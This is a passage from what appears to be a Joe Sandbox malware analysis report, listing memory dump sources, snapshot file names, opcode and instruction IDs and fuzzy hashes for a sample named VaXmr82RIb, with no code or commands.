                                                      • Opcode Fuzzy Hash: a8481141e2832ef6612658138b78611bdfbe1370b2140b334f541689e648b4e2
                                                      • Instruction Fuzzy Hash: 6AC09BA6F5463117CAD6A578305014C63516B59570342515DD405DB340D51D5D0513C5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074489374.00000000034A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_34a0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: beba05ff5886629ca6e95c82e805439c47da828b55926b8a23819c175712ca4c
                                                      • Instruction ID: ad6f0afe0b1e022625f9dd7ba01001dcadc0ee364dfcffc266875b474d92b146
                                                      • Opcode Fuzzy Hash: beba05ff5886629ca6e95c82e805439c47da828b55926b8a23819c175712ca4c
                                                      • Instruction Fuzzy Hash: D7C00238254500CFC744CB58E588C54B3A5FF4872535A85DAE40DCBB72C771EC55CA45
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074489374.00000000034A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_34a0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 73a5012bc9718f41ecddf22eb8e65365f364c913bce36dff3da9bcc525ad1969
                                                      • Instruction ID: 88eb40e917cdf194bf7601680b3d9cf14a6c7b673e4117d6b638cbe01be8d999
                                                      • Opcode Fuzzy Hash: 73a5012bc9718f41ecddf22eb8e65365f364c913bce36dff3da9bcc525ad1969
                                                      • Instruction Fuzzy Hash: ABC002342642048F8344DB59D488C11B3E9FF48A2435680D5E9098B732C631FC00CA44
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30075018335.0000000003620000.00000040.00000800.00020000.00000000.sdmp, Offset: 03620000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3620000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d9a6bd6c65f2431ed1205bdba72e92dc636918d3a0c0325271a71b29a6fc4146
                                                      • Instruction ID: 4611d8690d81637ca434566ff41349679680d1bb19b22439dcf4b371f46e7ee5
                                                      • Opcode Fuzzy Hash: d9a6bd6c65f2431ed1205bdba72e92dc636918d3a0c0325271a71b29a6fc4146
                                                      • Instruction Fuzzy Hash: B4B092A4754248478A182AEE205942B77CEA7887D0B104428A44E8B3CADDA1A801419A